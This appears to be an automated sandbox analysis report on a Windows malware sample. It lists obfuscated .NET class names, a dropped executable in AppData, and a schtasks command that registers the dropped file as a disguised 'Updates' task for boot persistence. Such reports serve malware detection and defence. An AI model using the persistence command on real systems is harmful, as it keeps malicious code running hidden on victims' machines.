Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, uqvTtGIvaBHE6UeMGK.cs	High entropy of concatenated method names: 'x240yvkwgf', 't2w0NiHm9o', 'gGLYivuXb3', 'hlZYbyaxfe', 'sc50xtVtqb', 'Wtf0T6la5a', 'ETh0DUkny9', 'ygq0tGS33p', 'n8S0ZrWofE', 'Nfq02CXI2j'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, zDpuySnEP5tQ1Ge5g9.cs	High entropy of concatenated method names: 'GRrYOMO4tJ', 'NpyYdJyWJw', 'lCHYpEZAoq', 'yjSYLhknL9', 'qVbYt1J2DM', 'WCmYqRivN4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, IDSxNlPIe1AtwndLFr.cs	High entropy of concatenated method names: 'lPyuCJbCQ7', 'FVDuKw4YK8', 'rsPuP4uWKN', 'iUMu3O5XSQ', 'tf3uFtMTbu', 'IEZuHbwJHS', 'iHou0KmTni', 'AxAuYHH5OC', 'nB0uB4uu0Y', 'LOQuJg6pfF'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, J4AsxZeGWdFi7E2jqj.cs	High entropy of concatenated method names: 'W3eIGZDDsH', 'M4uIjWv2vO', 'PgMIgBFpTU', 'pmiIQfdmYL', 'J3cIsRaFdy', 'wrpgonfAwo', 'z2IgUUNdQ4', 'qJHgvtMWj2', 'jSogy6jgAa', 'CTYgWKtuAb'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, s5tH6CgMQIoDxk6cC6.cs	High entropy of concatenated method names: 'wfTjtdmNxq', 'rjcjZLnOg2', 'DRtj2YYpO8', 'bEDj5RJUOb', 'gFFjoVnphM', 'Ru9jU35R2p', 'SC2jvjoqx6', 'hppjyVpteF', 'Hs6jWMWfLc', 'rWejNb0vOw'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, YAPLLtBb6NkWFSMtDy.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'esZwWYbvLw', 'Fc0wNx6iq3', 'rYOwzmCsfV', 'GtF1iiK5C5', 'tAN1bDUoY4', 'thP1w19xEA', 'UDo11cX0RI', 'IOWroPN9Y54npdvXYvj'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jNaYVizBweP65Gvgff.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tMKBm5bCva', 'WcHBFxIrlH', 'xSKBH3xkBF', 'rTvB0ZKoX9', 'bkTBYPjjJE', 'cgwBByQE15', 'h3FBJLXsgG'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jadlAxsynqkCnj8WVa.cs	High entropy of concatenated method names: 'VyLg7L063t', 'YX1g4jIDSW', 'lsQupxtcdC', 'PrfuLPgcmT', 'fZAuqaSg8B', 'NPau6XB6ua', 'XnculMSXmc', 'YewuXOxiC5', 'aNBu8201QJ', 'MP2unjm1eb'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, upTSKLy99yoEtfjfp1.cs	High entropy of concatenated method names: 'Dispose', 'saDbWZ3V0Y', 'OI4wdH4RSn', 'GOqee6Gcna', 'TeKbNcE3qT', 'cvwbzSuOUC', 'ProcessDialogKey', 'bqKwinPEmY', 'v9OwbgR2xD', 'AMpwwAySch'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, Rhy2Eh1eq08DxtC0GN.cs	High entropy of concatenated method names: 'ToString', 'SDIHxYlCoE', 'gpCHdpsfqj', 'vOBHp08yO3', 'SEfHLg3UsS', 'rBWHqQXHII', 'wxtH6gxreK', 'OAPHlRjfQ0', 'KtxHXVwSaU', 'IOiH8x8Irt'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, VUss1svOlRWUsddMXY.cs	High entropy of concatenated method names: 'MRDBb37295', 'AF7B1rilv0', 'NI8BhHTHma', 'YGlBMDX0n0', 'oqKBjtfPkW', 'eyTBgHmQKR', 'mCpBI21uDM', 'wSUYv74DeM', 'p1fYyO74wr', 'd1eYW34Lth'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, iS7yTTix2f7oFOT1q9.cs	High entropy of concatenated method names: 'NkBmPGlWsM', 'jSrm3aQAxT', 'alGmOQ3Cd9', 'GJxmdlBd64', 'vlOmL7oNu8', 'qpumqcJCpK', 'Bcoml7l1QF', 'BytmX8QmFc', 'bdOmntAw0D', 'PwGmxxBhoY'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, gC7Wkb36mD47bHS2vL.cs	High entropy of concatenated method names: 'cHJQVxgNX6', 'cGdQSa7VM1', 'YfaQkxwSyL', 'm8tQCwM1uH', 'PBXQ7Z7Jwy', 'TtvQKxLoF6', 'TtUQ4hBKM8', 'EmJQPsgFgT', 'Ru5Q360s2G', 'gPNQaVyP5a'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, bB6KGCc7idQBx93ujG.cs	High entropy of concatenated method names: 'oZJI2MLl8C', 't74I5UB5b8', 'AndIo3kblI', 'ToString', 'qUVIUS2BeA', 'chpIvokDu5', 'UVJMnCZk2ZVC2qOsDQf', 'PQawx0Zrd26EgmgASNc', 'AYQh8oZqkVqXNm3OgiW', 'DAFxp3Z10wvk0lxaYul'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, j1wlcXrOU9GBxr9O0kU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'frOJtxYYjA', 'DfNJZNPh5j', 'UDkJ2jtFrS', 'RMHJ5Pqg85', 'JWSJo20V7J', 'yfLJUwVnYl', 'qC8Jv3YCCX'
Source: 0.2.EUYIlr7uUX.exe.7260000.5.raw.unpack, jMClKYLbW0ZwMAjgIV.cs	High entropy of concatenated method names: 'UZa1GcB81e', 'zeF1MaqViA', 'CiM1jDxvZq', 'M9U1uYZoa3', 'ueL1gjZFoF', 'Mq81Iaro8K', 'Mh91QkDuZT', 'MoW1sOe0rc', 'OEF1rqm4lZ', 'bvm1ffuIaD'

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

File created: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
